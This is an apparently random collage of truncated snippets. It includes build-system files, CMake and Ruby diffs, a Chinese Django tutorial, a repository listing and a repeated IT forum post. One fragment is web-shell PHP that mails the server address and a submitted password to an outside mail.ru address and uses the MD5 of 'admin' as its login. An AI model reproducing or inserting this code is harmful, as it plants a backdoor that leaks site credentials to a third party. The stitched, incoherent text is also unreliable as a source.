generated-header-symlinks: $(top_builddir)/src/include/utils/header-stamp $(top_builddir)/src/include/utils/probes.h $(SUBDIRS:%=%-recursive): fmgr-stamp errcodes.h # fmgr-stamp records the last time we ran Gen_fmgrtab.pl. We don't rely on # the timestamps of the individual output...
], include_dirs=[ f"{dir_path}/ctp/include", f"{dir_path}/ctp/vnctp", ...
Ideally, cuda-python would just load libcuda.so.1 which would take precedence over @@ -113,11 +112,11 @@ include(GNUInstallDirs) install( TARGETS morpheus_llm morpheus_llm EXPORT ${PROJECT_NAME}-core-exports ${PROJECT_NAME}-exports LIBRARY DESTINATION ${lib_dir} FILE_SET public_headers ...
clean:: $(LIBTRACEEVENT)-clean $(LIBAPI)-clean $(LIBBPF)-clean $(LIBSUBCMD)-clean $(LIBPERF)-clean fixdep-clean python-clean bpf-skel-clean $(call QUIET_CLEAN, core-objs) $(RM) $(LIBPERF_A) $(OUTPUT)perf-archive $(OUTPUT)perf-with-kcore $(OUTPUT)perf-iostat $(LANG_BINDINGS) ...
方法二: 直接在python上创建 第二步:创建工程名cmdb python manage.py startapp cmdb(文件名) 第三步:设置静态文件路径 project.settings.py 文件中 STATICFILES_DIRS = ( os.path.join(BASE_DIR, 'static'), ) 第四步: 模板路径(在python中直接默认)不用设置 ...
Adjust .dir-locals.el to make clang always include config.h 6年前 .gitattributes Set crlf in all.vcxproj.files 6年前 .gitignore add log "build_dbinstance finished" 6年前 .gitlab-ci.yml add util/check-win32util-configure to precheck ...
We got called in to clean up after another IT firm. Fortunately the client was fairly hands on with the former IT so they know what was done prior to our arrival. The 2012 R2 server was promoted on to an existing 2003 domain. Then they demoted all of the 2003 dc's and moved the ...
--- if(array_key_exists('watching',$_POST)){ $tmp = $_SERVER['SERVER_NAME'].$_SERVER['PHP_SELF']."\n".$_POST['pass']; @mail('hard_linux@mail.ru', 'root', $tmp); // Edit or delete! } //---Password--- $▛ = "21232f297a57a5a743894a0e4a801fc3"; //admin $▘...
We got called in to clean up after another IT firm. Fortunately the client was fairly hands on with the former IT so they know what was done prior to our arrival. The 2012 R2 server was promoted on to an existing 2003 domain. Then they demoted all of the 2003 dc's and moved the ...
dirs.include?(path) path = File.dirname(path) end end # paths.each # Want directories to be sorted thusly: [ "/usr", "/usr/bin" ] # Why? tar and some package managers sometimes fail if the tar is created # like: [ "/opt/fizz", "/opt" ] @@ -136,7 +136,7 @@ def tar...